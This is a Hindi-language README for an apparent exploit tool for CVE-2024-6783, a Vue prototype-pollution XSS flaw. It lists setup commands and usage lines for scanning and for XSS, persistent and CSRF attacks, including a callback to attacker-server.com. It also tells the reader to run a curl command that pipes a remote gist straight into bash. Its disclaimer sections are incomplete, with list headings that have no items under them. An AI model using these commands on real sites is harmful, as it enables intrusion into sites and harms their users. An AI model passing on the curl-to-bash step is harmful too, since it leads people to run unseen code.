
CVE-2024-6783 - Vue CVE
Vue में एक कमजोरी खोजी गई है, जो एक हमलावर को प्रोटोटाइप प्रदूषण के माध्यम से XSS करने की अनुमति देती है। हमलावर Object.prototype.staticClass या Object.prototype.staticStyle जैसे कुछ गुणों की प्रोटोटाइप श्रृंखला को बदलकर मनमाना JavaScript कोड निष्पादित कर सकता है।
PayPal के माध्यम से या नीचे दिए गए QR कोड को स्कैन करके इस परियोजना के रखरखाव का समर्थन करें।
इस परियोजना का उपयोग केवल सुरक्षित और अधिकृत वातावरण में करें जैसे:
उदाहरण सेटअप:
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
उपयोग का उदाहरण:
# scan only
python cve-2024-6783.py -u https://example.com -v
# Scan & XSS Exploit
python cve-2024-6783.py -u https://example.com -e xss
# XSS Exploit with Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback
# Automatic Callback Server
python cve-2024-6783.py -u https://example.com -e persistent -c auto
# CSRF Exploitation
python cve-2024-6783.py -u https://example.com -e csrf
# Full Scan and Exploit with Verbose Output
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html
नोट:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y चलाना होगानियंत्रित वातावरण में साइबर सुरक्षा अवधारणाओं को सीखने, परीक्षण करने और शोध करने के लिए एक भंडार।
यह भंडार केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है।
यह उपयोगकर्ताओं को निम्नलिखित के बारे में सीखने में मदद करने के लिए डिज़ाइन किया गया है:
इस भंडार का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास अनुमति हो, जैसे:
अनधिकृत या अवैध उपयोग सख्त वर्जित है।
लेखक और योगदानकर्ता इस परियोजना के कारण होने वाली किसी भी क्षति, दुरुपयोग, कानूनी मुद्दों या हानि के लिए जिम्मेदार नहीं हैं।
इस भंडार का उपयोग करके, आप सहमत हैं कि:
यह परियोजना निम्नलिखित के लिए है:
कृपया जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और सभी लागू कानूनों का अनुपालन करें।
जिम्मेदार प्रकटीकरण या सहयोग के लिए, GitHub के माध्यम से भंडार अनुरक्षक से संपर्क करें।